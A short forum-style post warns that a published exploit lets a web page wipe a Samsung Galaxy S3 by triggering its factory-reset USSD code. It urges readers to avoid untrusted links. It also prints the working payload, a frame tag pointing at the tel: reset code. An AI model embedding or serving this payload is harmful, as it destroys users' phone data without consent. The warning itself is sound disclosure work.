I'll keep this quick in order to make sure everyone is aware of this exploit that has been published. I found it here: http://www.exquisitetweets.com/collection/tomscott/1762
Apparently the USSD code to wipe a S3 can be trigged in a browser iframe. Obviously this is bad bad BAD. Until there is a fix for this please keep your wits about you and avoid any hyperlinks to pages from untrusted sources.
the USSD code to factory data reset a Galaxy S3 is *2767*3855# can be triggered from browser like this: <frame src="tel:*2767*3855%23" />